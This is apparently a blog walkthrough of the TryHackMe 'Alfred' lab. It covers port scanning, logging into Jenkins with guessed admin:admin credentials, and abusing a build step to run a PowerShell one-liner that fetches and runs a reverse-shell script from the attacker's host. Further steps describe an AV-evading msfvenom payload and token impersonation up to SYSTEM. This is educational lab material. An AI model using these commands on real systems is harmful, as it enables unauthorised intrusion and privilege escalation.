5 min readMay 8, 2021


Hello everyone I hope you are done well, in this post I will be sharing my walk through of TryHackMe’s Alfred room. This was an easy windows machine where you would have to login into the admin portal by guessing the credential (which was quite simple) and then to find where you can execute system commands to get a reverse shell and from there seeing how you can escalate to SYSTEM.


80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Here we don’t see anything intersting so let’s move to other http port

PORT 8080 (HTTP)

We can see jenkins login portal so let’s try using the default credentials


And it didn’t work , let’s try admin:admin

This worked are we are in, now we need to find where we can execute commands so we can get a reverse shell on the target machine

Hover over the project you'll get a dropdown menu

You’ll have options like “Changes”, “Workspace”, “Build Now”, “Delete Project”,” Configure” and “Rename”. Select `Configure`

Switch to Build Environment Tab

Here you can see there’s a command written whoami so let's click on Apply and Save

Click on #2 then Console Ouput

And you can see what ever command we input there it will show the output so now what we can do is to host a powershell reverse shell script ,download it using powershell and execute the function in the script to get a shell

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Start your python3 http server

And our command will look like this , start a netcat listener

Now click on Build Now and that job will run and you'll get a shell

Generate a msfvenom payload with encoders to by pass AV

Host it on your local machine and download it by repeating the same method

Set up your metasploit listener

Execute the payload and you’ll see a meterpreter session will be popped

Running the command getprivs we can see what privileges we have on the machine

Here we can escalate our privleges through SeImpersonatePrivilege

Run the command load icognito through this module we can impersonate tokens

Now even though we have SYSTEM on the machine but still we won’t be able to access system files as it uses the primary token of the process and not the impersonated token so we need to migrate to a process running as SYSTEM which is services.exe

Then type shell to get a command prompt and navigate to C:\Windows\System32\config to get root flag.